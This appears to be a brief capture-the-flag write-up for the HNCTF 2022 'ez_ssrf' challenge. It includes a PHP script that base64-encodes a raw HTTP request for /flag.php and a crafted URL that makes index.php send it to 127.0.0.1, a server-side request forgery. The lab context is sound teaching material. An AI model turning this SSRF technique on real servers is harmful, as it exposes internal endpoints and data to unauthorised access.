NSS [HNCTF 2022 WEEK2]ez_ssrf

简介: NSS [HNCTF 2022 WEEK2]ez_ssrf

NSS [HNCTF 2022 WEEK2]ez_ssrf

先拿dirsearch扫一下。

访问/flag.php

访问/index.php

应该是从index.php传参,ssrf然后访问到flag.php。

因此构造poc.php:

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80


传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

目录
相关文章
|
2月前
|
安全 Windows
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
|
3月前
NSS [NISACTF 2022]popchains
NSS [NISACTF 2022]popchains
33 0
NSS [NISACTF 2022]popchains
|
3月前
|
Java
NSS [NSSRound#7 Team]ec_RCE
NSS [NSSRound#7 Team]ec_RCE
41 0
|
3月前
NSS [NISACTF 2022]babyupload
NSS [NISACTF 2022]babyupload
35 0
|
3月前
|
应用服务中间件 PHP nginx
NSS [HNCTF 2022 WEEK2]easy_include
NSS [HNCTF 2022 WEEK2]easy_include
38 0
|
11月前
|
SQL 关系型数据库 MySQL
NSS LitCTF部分wp
NSS LitCTF部分wp
51 0
|
安全 Java 数据安全/隐私保护
解决Fortify漏洞:Insecure Randomness(不安全随机数)
解决Fortify漏洞:Insecure Randomness(不安全随机数)
283 0